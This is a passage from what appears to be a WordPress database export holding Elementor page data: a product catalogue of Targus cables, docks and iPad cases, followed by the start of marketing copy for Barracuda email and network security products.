Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6634,3262,'_elementor_edit_mode','builder'),(6635,3262,'_elementor_template_type','post'),(6636,3262,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Email Protection<\\/h2><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Next-Generation Email Security<\\/strong><\\/h2><p>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Network and Application Security<\\/h2><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure 